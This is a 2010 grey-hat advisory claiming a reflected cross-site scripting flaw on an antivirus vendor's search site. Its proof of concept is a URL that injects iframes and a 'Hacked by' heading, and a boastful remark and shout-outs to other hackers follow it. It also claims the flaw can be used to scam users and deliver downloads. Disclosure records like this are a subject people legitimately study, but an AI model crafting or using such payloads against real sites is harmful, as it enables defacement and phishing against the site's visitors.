___________ _______________________________
\_   _____//   _____/\_   _____/\__    ___/
|    __)_ \_____  \  |    __)_   |    |
|        \/        \ |        \  |    |   http://www.eset.com/
|
/_______  /_______  //_______  /  |____|
\/        \/         \/   > Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://search.eset.com/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http;//search.eset.com/ suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-

http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox[]=en-US

Pretty much owned? >:D

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – http://greyhathackers.wordpress.com – Sora